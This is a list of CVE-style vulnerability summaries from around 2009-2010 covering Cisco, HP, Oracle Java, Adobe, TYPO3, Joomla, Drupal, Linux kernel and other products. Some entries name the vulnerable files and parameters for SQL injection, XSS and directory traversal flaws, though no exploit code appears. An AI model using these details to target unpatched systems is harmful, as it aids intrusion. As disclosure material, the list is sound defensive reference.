Unspecified vulnerability on the Cisco Digital Media Player before 5.2 allows remote attackers to hijack the source of (1) video or (2) data for a display via unknown vectors, related to a "content injection" issue, aka Bug ID CSCtc46024.
Unspecified vulnerability in Cisco Digital Media Manager (DMM) 5.0.x and 5.1.x allows remote authenticated users to gain privileges via unknown vectors, and consequently execute arbitrary code via a crafted web application, aka Bug ID CSCtc46008.
Unspecified vulnerability in the BIOS in Intel Desktop Board DB, DG, DH, DP, and DQ Series allows local administrators to execute arbitrary code in System Management Mode (SSM) via unknown attack vectors.
Multiple unspecified vulnerabilities in the Network Controller and Web Server in Xerox WorkCentre 5632, 5638, 5645, 5655, 5665, 5675, and 5687 allow remote attackers to (1) access mailboxes via unknown vectors that bypass Scan to Mailbox authorization or (2) read device configuration information via via unknown vectors that bypass web server authorization.
Unspecified vulnerability in HP SOA Registry Foundation 6.63 and 6.64 allows remote authenticated users to gain privileges via unknown vectors.
Cross-site scripting (XSS) vulnerability in HP SOA Registry Foundation 6.63 and 6.64 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in HP SOA Registry Foundation 6.63 and 6.64 allows remote attackers to obtain "unauthorized access to data" via unknown vectors.
Unspecified vulnerability on the HP DreamScreen 100 and 130 with firmware before 1.6.0.0, when using a web-connected configuration, allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Network Node Manager (NNM) 8.10, 8.11, 8.12, and 8.13 allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in Record Management Services (RMS) before VMS83A_RMS-V1100 for HP OpenVMS on the Alpha platform allows local users to gain privileges via unknown vectors.
The ip6_dst_lookup_tail function in net/ipv6/ip6_output.c in the Linux kernel before 2.6.27 does not properly handle certain circumstances involving an IPv6 TUN network interface and a large number of neighbors, which allows attackers to cause a denial of service (NULL pointer dereference and OOPS) or possibly have unspecified other impact via unknown vectors.
Multiple stack-based buffer overflows in Embarcadero Technologies InterBase SMP 2009 9.0.3.437 allow remote attackers to execute arbitrary code via unknown vectors involving crafted packets.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in modules/arcade/index.php in PHP MySpace Gold Edition 8.0 and 8.10 allows remote attackers to execute arbitrary SQL commands via the gid parameter in a show_stats action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in product_list.php in JCE-Tech PHP Calendars, downloaded 2010-01-11, allows remote attackers to execute arbitrary SQL commands via the cat parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in the Photo Book (goof_fotoboek) extension 1.7.14 and earlier for TYPO3 has unknown impact and remote attack vectors.
Cross-site scripting (XSS) vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.  NOTE: this issue could not be reproduced by the vendor, but a patch was provided anyway. The original researcher is reliable.
Directory traversal vulnerability in C3 Corp. WebCalenderC3 0.32 and earlier allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in the kiddog_mysqldumper (kiddog_mysqldumper) extension 0.0.3 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
Unspecified vulnerability in the SB Folderdownload (sb_folderdownload) extension 0.2.2 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
Unspecified vulnerability in the Photo Book (goof_fotoboek) extension 1.7.14 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
Unspecified vulnerability in Sun Java System Identity Manager (aka IdM) 8.1.0.5 and 8.1.0.6, when Sun Java System Access Manager, OpenSSO Enterprise 8.0, or IBM Tivoli Access Manager is used, allows remote attackers to obtain administrative access via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the ACL Manager plugin (plugins/acl/ajax.php) in DokuWiki before 2009-12-25c allow remote attackers to hijack the authentication of administrators for requests that modify access control rules, and other unspecified requests, via unknown vectors.
Unspecified vulnerability in the OpenID Identity Authentication extension in TYPO3 4.3.0 allows remote attackers to bypass authentication and gain access to a backend user account via unknown attack vectors in which both the attacker and victim have an OpenID provider that discards identities during authentication.
Unspecified vulnerability in the Edit Contact scene in Ultra-light Mode in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.241 for Domino 8.0.2 FP3 has unknown impact and attack vectors, aka SPR LSHR7TBLY5.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0193.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0196.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0193 and CVE-2010-0196.
Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.19, 3.5.x before 3.5.9, and 3.6.x before 3.6.2; Thunderbird before 3.0.4; and SeaMonkey before 2.0.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.5.9 and 3.6.x before 3.6.2, Thunderbird before 3.0.4, and SeaMonkey before 2.0.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to execute arbitrary code via unknown vectors, aka IronPort Bug 65923.
Unspecified vulnerability in the WebSafe DistributorServlet in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65922.
Unspecified vulnerability in the administrative interface in the embedded HTTPS server on the Cisco IronPort Encryption Appliance 6.2.x before 6.2.9.1 and 6.5.x before 6.5.2, and the IronPort PostX MAP before 6.2.9.1, allows remote attackers to read arbitrary files via unknown vectors, aka IronPort Bug 65921.
Stack-based buffer overflow in the SpreadSheet Lotus 123 reader (wkssr.dll), as used in Autonomy KeyView 10.4 and 10.9, Symantec Mail Security, and possibly other products, allows remote attackers to execute arbitrary code via unspecified vectors related to floating point conversion in unknown record types.
Buffer overflow in an ActiveX control (SYMLTCOM.dll) in Symantec N360 1.0 and 2.0; Norton Internet Security, AntiVirus, SystemWorks, and Confidential 2006 through 2008; and Symantec Client Security 3.0.x before 3.1 MR9, and 3.1.x before MR9; allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.  NOTE: this is only a vulnerability if the attacker can "masquerade as an authorized site."
Unspecified vulnerability in the Broadcom Integrated NIC Management Firmware 1.x before 1.40.0.0 and 8.x before 8.08 on the HP Small Form Factor and Microtower platforms allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0093.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18 and 5.0 Update 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the March 2010 CPU.  Oracle has not commented on claims from a reliable researcher that this is due to missing privilege checks during deserialization of RMIConnectionImpl objects, which allows remote attackers to call system-level Java functions via the ClassLoader of a constructor that is being deserialized.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0095.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, and 5.0 Update 23 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2010-0084.
Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18 allows remote attackers to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0085.
Unspecified vulnerability in the Java Web Start, Java Plug-in component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Portal component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-0855.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-0088.
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality via unknown vectors, a different vulnerability than CVE-2010-0091.
Unspecified vulnerability in Oracle OpenSolaris 8, 9, and 10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the HotSpot Server component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2381.
Unspecified vulnerability in the PeopleSoft Enterprise HCM - eProfile component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9 Bundle, #21 and 9.0 Bundle #11 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Multiple vulnerabilities in the JRockit component in BEA Product Suite R27.6.5 using JRE/JDK 1.4.2, 5, and 6 allow remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: this CVE identifier overlaps CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, and CVE-2009-3877.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the CRM Technical Foundation (mobile) component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Application Express Application Builder component in Oracle Database 3.2.1.00.10 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle HRMS (Self Service) component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP2, and 10.3.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the WebLogic Server in Oracle WebLogic Server 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, and 10.3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is a buffer overflow in observiced.exe that allows remote attackers to execute arbitrary code via vectors related to a "reverse lookup of connections" to TCP port 10000.
Unspecified vulnerability in the Listener component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Application Server 10.1.2.3 and 10.1.3.4 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0, SP7, 8.1SP6, 9.0, 9.1, 9.2MP3, 10.0MP1, and 10.3.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2MP2, and 10.0 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Application Server 10.1.2.3 and 10.1.3.4 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Access Manager Identity Server component in Oracle Application Server 7.0.4.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the MojoX::Dispatcher::Static implementation in Mojolicious before 0.991250 has unknown impact and attack vectors.
Unspecified vulnerability in Palm Pre WebOS before 1.2.1 has unknown impact and attack vectors related to an "included contact template file."
Multiple unspecified vulnerabilities in Smarty before 3.0.0 beta 6 have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in frmTickets.aspx in SmarterTools SmarterTrack before 4.0.3504 allows remote attackers to inject arbitrary web script or HTML via the email address field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in the Directory Listing (dir_listing) extension 1.1.0 and earlier for TYPO3 allows remote attackers to have an unspecified impact via unknown vectors.
Unspecified vulnerability in the ClickStream Analyzer [output] (alternet_csa_out) extension 0.3.0 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
Directory traversal vulnerability in the Messaging (com_messaging) component before 1.5.1 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter in a messages action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in ATRC ACollab 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) address parameter to profile.php or the (2) description parameter to events/add_event.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to cause a denial of service (device reload) via unknown network traffic, as demonstrated by a "connection stress test," aka Bug ID CSCsq68451.
Cross-site scripting (XSS) vulnerability in index.php in oBlog allows remote attackers to inject arbitrary web script or HTML via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Race condition in the tty_fasync function in drivers/char/tty_io.c in the Linux kernel before 2.6.32.6 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via unknown vectors, related to the put_tty_queue and __f_setown functions.  NOTE: the vulnerability was addressed in a different way in 2.6.32.9.
Unspecified vulnerability in the Administration Console in Novell Access Manager before 3.1 SP1 allows attackers to access system files via unknown attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in WebGUI before 7.7.14 allow remote attackers to hijack the authentication of users for unspecified requests via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in ToutVirtual VirtualIQ Pro 3.5 build 8691 allow remote attackers to inject arbitrary web script or HTML via the (1) addNewDept, (2) deptId, or (3) deptDesc parameter to tvserver/server/user/addDepartment.jsp; or the (4) firstName, (5) lastName, or (6) email parameter in a save action to tvserver/user/user.do.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in OpenX 2.8.1 and 2.8.2 allows remote attackers to bypass authentication and obtain access to an Administrator account via unknown vectors, possibly related to www/admin/install.php, www/admin/install-plugins.php, and other www/admin/ files.
Multiple directory traversal vulnerabilities in Sysax Multi Server 4.5 allow remote authenticated users to read or modify arbitrary files via crafted FTP commands.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in phpMyFAQ before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter in a sitemap action, (2) the search parameter in a search action, (3) the tagging_id parameter in a search action, (4) the highlight parameter in an artikel action, (5) the artlang parameter in an artikel action, (6) the letter parameter in a sitemap action, (7) the lang parameter in a show action, (8) the cat parameter in a show action, (9) the newslang parameter in a news action, (10) the artlang parameter in a send2friend action, (11) the cat parameter in a send2friend action, (12) the id parameter in a send2friend action, (13) the srclang parameter in a translate action, (14) the id parameter in a translate action, (15) the cat parameter in a translate action, (16) the cat parameter in an add action, or (17) the question parameter in an add action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in Hitachi Cosminexus V4 through V8, Processing Kit for XML, and Developer's Kit for Java, as used in products such as uCosminexus, Electronic Form Workflow, Groupmax, and IBM XL C/C++ Enterprise Edition 7 and 8, allows remote attackers to have an unknown impact via vectors related to the use of GIF image processing APIs by a Java application, and a different issue from CVE-2007-3794.
Cross-site request forgery (CSRF) vulnerability in the order-management functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal, when a custom checkout completion message is enabled, allows attackers to obtain sensitive information via unknown vectors.
The PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal does not properly validate orders, which allows remote attackers to trigger unspecified "duplicate actions" via unknown vectors.
Unspecified vulnerability in the ClickHeat plugin, as used in phpMyVisites before 2.4, has unknown impact and attack vectors.  NOTE: due to lack of details from the vendor, it is not clear whether this is related to CVE-2008-5793.
Cross-site scripting (XSS) vulnerability in the Contact module in Exponent CMS 0.97-GA20090213 allows remote attackers to inject arbitrary web script or HTML via the email parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Extras Manager before 2.0.0.67 in Skype before 4.1.0.179 on Windows has unknown impact and attack vectors.
Unspecified vulnerability in JustSystems Corporation ATOK 2006 through 2009 and ATOK flat-rate service, and Just Smile 4 with the ATOK Smile module, allows physically proximate users to bypass the screen lock and execute commands with system privileges via unknown vectors related to "launching external applications."
SQL injection vulnerability in visitorduration.php in Gonafish WebStatCaffe allows remote attackers to execute arbitrary SQL commands via the nodayshow parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Webesse E-Card (ws_ecard) extension 1.0.2 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
Cross-site scripting (XSS) vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to inject arbitrary web script or HTML via the fid parameter in a view_forum action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in search.php in phpFK PHP Forum ohne 7.0.4 allows remote attackers to inject arbitrary web script or HTML via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in JetCast.exe 2.0.4.1109 in jetAudio 7.5.2 and 7.5.3.15 allows remote attackers to execute arbitrary code via a long title in a FLAC file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Integer overflow in FFmpeg 0.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
FFmpeg 0.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors that trigger a stack-based buffer overflow.
SQL injection vulnerability in realestate20/loginaction.php in NetArt Media Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the Password parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in PHP Inventory 1.2 allows remote authenticated users to execute arbitrary SQL commands via the sup_id parameter in a suppliers details action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.131 for Domino 8.0.x has unknown impact and attack vectors, aka SPR SDOY7RHBNH.
Unspecified vulnerability in base_local_rules.php in Basic Analysis and Security Engine (BASE) before 1.4.4 allows remote attackers to include arbitrary local files via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in the Joomulus (mod_joomulus) module 2.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the tagcloud parameter in a tags action to (1) tagcloud_ell.swf, (2) tagcloud_eng.swf, (3) tagcloud_por.swf, (4) tagcloud_rus.swf, and possibly (5) tagcloud_jpn.swf.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in Zenphoto 1.2.5 allows remote attackers to execute arbitrary SQL commands via the title parameter in a news action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Image Assist module 5.x-1.x before 5.x-1.8, 5.x-2.x before 2.0-alpha4, 6.x-1.x before 6.x-1.1, 6.x-2.x before 2.0-alpha4, and 6.x-3.x-dev before 2009-07-15, a module for Drupal, does not properly enforce privilege requirements for unspecified pages, which allows remote attackers to read the (1) title or (2) body of an arbitrary node via unknown vectors.
Multiple unspecified vulnerabilities in Ortro before 1.3.4 have unknown impact and attack vectors.
Unspecified vulnerability in LDAP3A.exe in MailSite 8.0.4 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 7.13 through 8.11.  NOTE: as of 20091229, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Multiple unspecified vulnerabilities in the Vsftpd Webmin module before 1.3b for the Vsftpd server have unknown impact and attack vectors related to "Some security issues."
Buffer overflow in the bd daemon in F5 Networks BIG-IP Application Security Manager (ASM) 9.4.4 through 9.4.7 and 10.0.0 through 10.0.1, and Protocol Security Manager (PSM) 9.4.5 through 9.4.7 and 10.0.0 through 10.0.1, allows remote attackers to cause a denial of service (crash) via unknown vectors.  NOTE: some of these details are obtained from third party information.
The fuse_ioctl_copy_user function in the ioctl handler in fs/fuse/file.c in the Linux kernel 2.6.29-rc1 through 2.6.30.y uses the wrong variable in an argument to the kunmap function, which allows local users to cause a denial of service (panic) via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in PyForum 1.0.3 and possibly earlier versions, and possibly zForum, allow remote attackers to hijack the authentication of victims for requests that change passwords, and other unspecified requests, via unknown vectors.
Multiple unspecified vulnerabilities in Trac before 0.11.6 have unknown impact and attack vectors, possibly related to (1) "policy checks in report results when using alternate formats" or (2) a "check for the 'raw' role that is missing in docutils &lt; 0.6."
Unspecified vulnerability in the Watchdog (aba_watchdog) extension 2.0.2 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
Multiple unspecified vulnerabilities in Centreon before 2.1.4 have unknown impact and attack vectors in the (1) ping tool, (2) traceroute tool, and (3) ldap import, possibly related to improper authentication.
Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Blog allows remote attackers to inject arbitrary web script or HTML via the cname parameter, related to the act and id parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Job Exchange (jobexchange) extension 0.0.3 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in the No indexed Search (no_indexed_search) extension 0.2.0 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in the Subscription (mf_subscription) extension 0.2.2 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in the Flash SlideShow (slideshow) extension 0.2.2 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in the Diocese of Portsmouth Calendar (pd_calendar) extension 0.4.1 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unknown vectors, a different issue than CVE-2008-6691.
Multiple unspecified vulnerabilities in bundled stored procedures in the Spatial Extender component in IBM DB2 9.5 before FP5 have unknown impact and remote attack vectors, related to "remote exploits."
The Install component in IBM DB2 9.5 before FP5 and 9.7 before FP1 configures the High Availability (HA) scripts with incorrect file-permission and authorization settings, which has unknown impact and local attack vectors.
Unspecified vulnerability in db2licm in the Engine Utilities component in IBM DB2 9.5 before FP5 has unknown impact and local attack vectors.
Unspecified vulnerability in the DRDA Services component in IBM DB2 9.5 before FP5 allows remote authenticated users to cause a denial of service (server trap) by calling a SQL stored procedure in unknown circumstances.
The Client Interfaces component in IBM DB2 8.2 before FP18, 9.1 before FP8, 9.5 before FP5, and 9.7 before FP1 does not validate an unspecified pointer, which allows attackers to overwrite "external memory" via unknown vectors, related to a missing "check for null pointers."
Cross-site scripting (XSS) vulnerability in searchresults_main.php in ZeeLyrics 3x allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the EXT4_IOC_MOVE_EXT (aka move extents) ioctl implementation in the ext4 filesystem in the Linux kernel 2.6.32-git6 and earlier allows local users to cause a denial of service (filesystem corruption) via unknown vectors, a different vulnerability than CVE-2009-4131.
mod/glossary/showentry.php in the Glossary module for Moodle 1.8 before 1.8.11 and 1.9 before 1.9.7 does not properly perform access control, which allows attackers to read unauthorized Glossary entries via unknown vectors.
The LAMS module (mod/lams) for Moodle 1.8 before 1.8.11 and 1.9 before 1.9.7 stores the (1) username, (2) firstname, and (3) lastname fields within the user table, which allows attackers to obtain user account information via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Moodle 1.8 before 1.8.11 and 1.9 before 1.9.7 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Authentication Manager (aka utauthd) in Sun Ray Server Software 4.0 and 4.1 allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors.
Multiple buffer overflows in unspecified setuid executables in the DataStage subsystem in IBM InfoSphere Information Server 8.1 before FP1 have unknown impact and attack vectors.
The process function in data/class/pages/admin/customer/LC_Page_Admin_Customer_SearchCustomer.php in EC-CUBE Ver2 2.4.0 RC1 through 2.4.1, and Community Edition r18068 through r18428, allows remote attackers to obtain sensitive information (customer data) via unknown vectors related to sessions.
The Kide Shoutbox (com_kide) component 0.4.6 for Joomla! does not properly perform authentication, which allows remote attackers to post messages with an arbitrary account name via an insertar action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in ActiveWebSoftwares Active Bids allow remote attackers to execute arbitrary SQL commands via (1) the catid parameter in the PATH_INFO to the default URI or (2) the catid parameter to default.asp.  NOTE: this might overlap CVE-2009-0429.3.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in files/login.asp in JiRo's Banner System eXperience (JBSX) allow remote attackers to execute arbitrary SQL commands via the (1) admin or (2) password field, a related issue to CVE-2007-6091.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Itamar Elharar MusicGallery (com_musicgallery) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an itempage action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in dialog/file_manager.php in Interspire Knowledge Manager 5 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the kernel in Sun Solaris 10 and OpenSolaris 2009.06 on the x86-64 platform allows local users to gain privileges via unknown vectors, as demonstrated by the vd_sol_local module in VulnDisco Pack Professional 8.12.  NOTE: as of 20091203, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in the kernel in Sun OpenSolaris 2009.06 allows remote attackers to cause a denial of service (panic) via unknown vectors, as demonstrated by the vd_solaris2 module in VulnDisco Pack Professional 8.12.  NOTE: as of 20091203, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in HP Enterprise Cluster Master Toolkit (ECMT) B.05.00 on HP-UX B.11.23 (11i v2) and HP-UX B.11.31 (11i v3) allows local users to gain access to an Oracle or Sybase database via unknown vectors.
Unspecified vulnerability in HP OpenView Storage Data Protector 6.00 and 6.10 allows local users to obtain unspecified "access" via unknown vectors.
Unspecified vulnerability in the Simple download-system with counter and categories (kk_downloader) extension 1.2.1 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
Unspecified vulnerability in the XMLAccess component in IBM WebSphere Portal 6.1.x before 6.1.0.3 has unknown impact and attack vectors, related to the work directory.
drivers/firewire/ohci.c in the Linux kernel before 2.6.32-git9, when packet-per-buffer mode is used, allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unknown other impact via an unspecified ioctl associated with receiving an ISO packet that contains zero in the payload-length field.
